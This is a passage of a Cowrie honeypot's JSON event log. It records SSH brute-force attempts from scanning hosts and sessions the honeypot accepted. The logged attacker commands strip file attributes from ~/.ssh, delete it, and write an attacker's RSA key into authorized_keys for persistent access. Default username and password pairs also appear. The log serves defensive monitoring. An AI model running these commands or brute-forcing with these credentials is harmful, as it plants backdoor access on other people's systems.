ac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.247165Z","src_ip":"213.6.203.226","session":"934fb743a105"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.263471Z","src_ip":"212.227.235.229","session":"35c70c67b59a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.565675Z","src_ip":"213.6.203.226","session":"934fb743a105"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.636261Z","src_ip":"213.6.203.226","session":"934fb743a105"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.637047Z","src_ip":"213.6.203.226","session":"1b294786e7ba"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:56.827712Z","src_ip":"212.227.235.229","session":"35c70c67b59a"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":41704,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7bfa6f36787","protocol":"ssh","message":"New connection: 92.118.39.62:41704 (1.2.3.4:22) [session: b7bfa6f36787]","sensor":"my-vps","timestamp":"2025-09-09T05:48:57.386035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:48:57.387182Z","src_ip":"92.118.39.62","session":"b7bfa6f36787"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:48:57.417124Z","src_ip":"92.118.39.62","session":"b7bfa6f36787"}
{"eventid":"cowrie.login.failed","username":"azureuser","password":"azureuser","message":"login attempt [azureuser/azureuser] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:57.508346Z","src_ip":"92.118.39.62","session":"b7bfa6f36787"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:57.975981Z","src_ip":"212.227.235.229","session":"35c70c67b59a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:58.540439Z","src_ip":"92.118.39.62","session":"b7bfa6f36787"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52100,"dst_ip":"1.2.3.4","dst_port":22,"session":"f22af0c53b5a","protocol":"ssh","message":"New connection: 212.227.235.229:52100 (1.2.3.4:22) [session: f22af0c53b5a]","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.340213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.341557Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.422335Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.782878Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:49:09.962992Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.963644Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:49:09.964568Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.045943Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:49:10.310796Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.311447Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.395006Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.395898Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52110,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fa909e76af3","protocol":"ssh","message":"New connection: 212.227.235.229:52110 (1.2.3.4:22) [session: 8fa909e76af3]","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.473833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.475035Z","src_ip":"212.227.235.229","session":"8fa909e76af3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.554061Z","src_ip":"212.227.235.229","session":"8fa909e76af3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:49:10.908736Z","src_ip":"212.227.235.229","session":"8fa909e76af3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:11.990109Z","src_ip":"212.227.235.229","session":"8fa909e76af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52126,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd5e23854a0a","protocol":"ssh","message":"New connection: 212.227.235.229:52126 (1.2.3.4:22) [session: bd5e23854a0a]","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.066370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.067211Z","src_ip":"212.227.235.229","session":"bd5e23854a0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.144848Z","src_ip":"212.227.235.229","session":"bd5e23854a0a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.496810Z","src_ip":"212.227.235.229","session":"bd5e23854a0a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.575330Z","src_ip":"212.227.235.229","session":"f22af0c53b5a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:12.576345Z","src_ip":"212.227.235.229","session":"bd5e23854a0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59310,"dst_ip":"1.2.3.4","dst_port":22,"session":"e857237a03ff","protocol":"ssh","message":"New connection: 212.227.235.229:59310 (1.2.3.4:22) [session: e857237a03ff]","sensor":"my-vps","timestamp":"2025-09-09T05:49:31.371423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:49:31.372059Z","src_ip":"212.227.235.229","session":"e857237a03ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:49:31.553768Z","src_ip":"212.227.235.229","session":"e857237a03ff"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T05:49:32.636807Z","src_ip":"212.227.235.229","session":"e857237a03ff"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:33.812018Z","src_ip":"212.227.235.229","session":"e857237a03ff"}
{"eventid":"cowrie.session.connect","src_ip":"103.97.47.51","src_port":48823,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e23bec3f4ea","protocol":"telnet","message":"New connection: 103.97.47.51:48823 (1.2.3.4:23) [session: 7e23bec3f4ea]","sensor":"my-vps","timestamp":"2025-09-09T05:49:35.772264Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64933,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d204824b717","protocol":"ssh","message":"New connection: 212.227.235.229:64933 (1.2.3.4:22) [session: 6d204824b717]","sensor":"my-vps","timestamp":"2025-09-09T05:49:52.629774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:49:52.630698Z","src_ip":"212.227.235.229","session":"6d204824b717"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:49:52.763366Z","src_ip":"212.227.235.229","session":"6d204824b717"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-09T05:49:53.300960Z","src_ip":"212.227.235.229","session":"6d204824b717"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:49:54.430954Z","src_ip":"212.227.235.229","session":"6d204824b717"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":58611,"dst_ip":"1.2.3.4","dst_port":22,"session":"e384d39cd308","protocol":"ssh","message":"New connection: 213.6.203.226:58611 (1.2.3.4:22) [session: e384d39cd308]","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.089157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.093142Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.160355Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.login.success","username":"root","password":"Configit123","message":"login attempt [root/Configit123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.432186Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:01.600369Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.601301Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.602433Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:01.673621Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:01.951127Z","src_ip":"213.6.203.226","session":"e384d39cd308"}
